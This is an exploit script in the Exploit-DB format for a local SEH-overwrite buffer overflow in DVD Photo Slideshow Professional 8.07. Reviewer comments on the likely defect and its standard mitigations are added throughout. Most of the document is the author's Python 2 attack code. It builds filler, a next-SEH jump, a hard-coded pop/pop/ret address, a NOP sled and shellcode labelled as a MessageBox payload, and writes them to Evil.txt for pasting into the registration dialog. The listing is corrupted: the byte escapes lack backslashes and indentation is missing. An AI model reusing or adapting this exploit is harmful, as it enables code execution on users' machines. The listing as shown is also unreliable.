# Exploit Title: DVD Photo Slideshow Professional 8.07 - Buffer Overflow (SEH)
# Date: 2018-09-06
# Exploit Author: T3jv1l
# Vendor Homepage: http://www.dvd-photo-slideshow.com/
# Software:www.dvd-photo-slideshow.com/dps_install.exe
# Category:Local
# Contact:https://twitter.com/T3jv1l
# Version: DVD Photo Slideshow Professional 8.07
# Tested on: Windows 7 SP1 x86
# Method Corelan Coder : https://www.corelan.be/index.php/2009/07/28/seh-based-exploit-writing-tutorial-continued-just-another-example-part-3b/

#!/bin/python

# Usage banner printed at run time. It names the input path for the issue:
# the application's Help > Register... dialog, whose Registration Name field
# receives the pasted contents of Evil.txt. Reaching it needs a local user
# to paste the text and click Activate (the header lists Category: Local).
# The banner is a runtime string and is kept exactly as published.
# NOTE(review): the underlying defect is presumably an unbounded copy of the
# Registration Name value into a fixed-size buffer; the vendor-side fix would
# be a length check on that field. The page does not show the vulnerable
# code, so confirm this against the binary.
# NOTE(review): the `print"""..."""` statement form is Python 2 only, which
# matches step 2 of the banner.
print"""
#1. Download and install the setup file
#2. Run this exploit code via python 2.7
#3. A file "Evil.txt" will be created
#4. Click Help > Register... in tool bar
#5. Copy the contents of the file (Evil.txt)and paste in the Registration Name field
#6. Click Activate and BOOMMMM !!!! """

import struct

# Components of the overlong Registration Name value, in the order they are
# concatenated further down: filler, the "next SEH" field, the SEH handler
# pointer, then padding.
# NOTE(review): as printed on this page the "x90..." literals are ordinary
# text characters, not byte escapes; this looks like an artefact of how the
# listing was extracted.

# 256 filler characters; presumably the distance to the SEH record on the
# tested build (Windows 7 SP1 x86 per the header). TODO confirm.
junk_byte = "A" * 256
nseh = "x90x90xebx10"
# Handler pointer packed as a little-endian unsigned 32-bit value. The
# author's trailing note identifies the address as a pop/pop/ret sequence.
# A hard-coded address only works if the module that contains it loads at
# the same base every time and is accepted as an exception handler, so the
# module was presumably built without ASLR and SafeSEH. Verify per module.
# SEHOP, SafeSEH/ASLR-enabled builds and DEP are the standard mitigations
# for this class of SEH overwrite.
seh = struct.pack("<L",0x100152c9) # 0x100152c9 : pop edi # pop esi # ret
nop = "x90" *24

# Payload string placed after the padding. The author's label below
# attributes it to a public "MessageBox + Null-Free" sample of 113 bytes.
# NOTE(review): that description is taken from the label only; this page
# does not verify the payload's behaviour. If the label is accurate, the
# symptom to look for in triage is an unexpected message box or a crash of
# the application right after text is pasted into the registration dialog.
#Windows - MessageBox + Null-Free Shellcode (113 bytes) : BrokenByte

buf = ("x31xd2xb2x30x64x8bx12x8bx52x0cx8bx52x1cx8bx42"
"x08x8bx72x20x8bx12x80x7ex0cx33x75xf2x89xc7x03"
"x78x3cx8bx57x78x01xc2x8bx7ax20x01xc7x31xedx8b"
"x34xafx01xc6x45x81x3ex46x61x74x61x75xf2x81x7e"
"x08x45x78x69x74x75xe9x8bx7ax24x01xc7x66x8bx2c"
"x6fx8bx7ax1cx01xc7x8bx7cxafxfcx01xc7x68x79x74"
"x65x01x68x6bx65x6ex42x68x20x42x72x6fx89xe1xfe"
"x49x0bx31xc0x51x50xffxd7")

# Trailing filler: pads the value to a fixed total of 4000 characters. Its
# length is derived from the combined length of the parts defined above.
crash = "T" * (4000 -len(junk_byte+nseh+seh+nop+buf))
# Final value in field order: filler, next-SEH field, handler pointer,
# padding, payload, trailing filler.
exploit = junk_byte + nseh + seh + nop + buf + crash
# Write the value to Evil.txt in the current working directory, in text
# mode "w".
# NOTE(review): the bare `except:` hides the actual error, and its message
# is prefixed "[+]" although it reports a failure.
# NOTE(review): the statements under `try:` and `except:` have lost their
# indentation on this page, and `print "..."` is Python 2 syntax; the code
# is left exactly as published.
try:
f=open("Evil.txt","w")
f.write(exploit)
f.close()
except:
print "[+] File cannot be created"